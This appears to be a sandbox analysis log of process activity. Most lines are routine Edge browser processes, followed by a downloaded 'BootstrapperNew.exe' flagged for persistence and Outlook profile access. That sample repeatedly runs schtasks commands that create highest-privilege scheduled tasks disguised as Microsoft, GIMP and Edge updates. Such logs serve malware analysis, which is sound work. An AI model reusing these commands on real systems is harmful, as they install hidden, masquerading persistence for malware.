C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:12⤵PID:3220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:12⤵PID:1568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:12⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵PID:4344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5732 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4284 /prefetch:12⤵PID:4988
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5980 /prefetch:82⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5992 /prefetch:12⤵PID:2560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6404 /prefetch:82⤵PID:2348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:12⤵PID:2460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5820 /prefetch:82⤵PID:2332
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:12⤵PID:4000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:12⤵PID:5004
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6824 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1276 /prefetch:12⤵PID:2780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2040 /prefetch:12⤵PID:3048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1168 /prefetch:12⤵PID:1692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7056 /prefetch:12⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6456 /prefetch:22⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2084
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3656 /prefetch:12⤵PID:1284
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5732 /prefetch:12⤵PID:4016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:12⤵PID:3012
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵PID:1844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1220 /prefetch:12⤵PID:4392
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:12⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5040 /prefetch:12⤵PID:3016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6800 /prefetch:12⤵PID:5036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:12⤵PID:1536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6688 /prefetch:12⤵PID:1136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7252 /prefetch:12⤵PID:748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,13160997000556059584,4671145650416222360,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7364 /prefetch:12⤵PID:188
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1004
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3836
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4132
-
C:\Users\Admin\Downloads\BootstrapperNew.exe"C:\Users\Admin\Downloads\BootstrapperNew.exe"1⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1684 -
C:\Windows\SYSTEM32\CMD.exe"CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe" & exit2⤵PID:2892
-
C:\Windows\system32\schtasks.exeSchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Microsoft Access Update" /tr "C:\Program Files\xdwdWireshark Host.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:4988
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:5016
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4160
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST & exit2⤵PID:1484
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo 5 /tn "Microsoft Edge Host" /tr "C:\Users\Public\Pictures\xdwdNode.js.exe" /RL HIGHEST3⤵PID:1872
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4720
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3252
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:5092
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:5088
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1128
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3588
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1484
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3964
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1656
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2920
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1660
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2216
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4160
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4056
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1256
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4928
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:544
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1488
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:840
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3104
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2868
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4912
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4752
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2548
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1304
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3648
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3504
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2028
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4276
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4964
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2792
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:452
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4784
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:2156
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:4424
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:1032
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2536
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:3204
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3580
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:1552
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2156
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3324
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1388
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:4948
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:3076
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:3864
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:748
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
PID:4460
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:2264
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵PID:3256
-
-
-
C:\Windows\SYSTEM32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST & exit2⤵PID:1476
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "GIMP Upgrade" /tr "C:\Program Files\xdwdWireshark Host.exe" /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
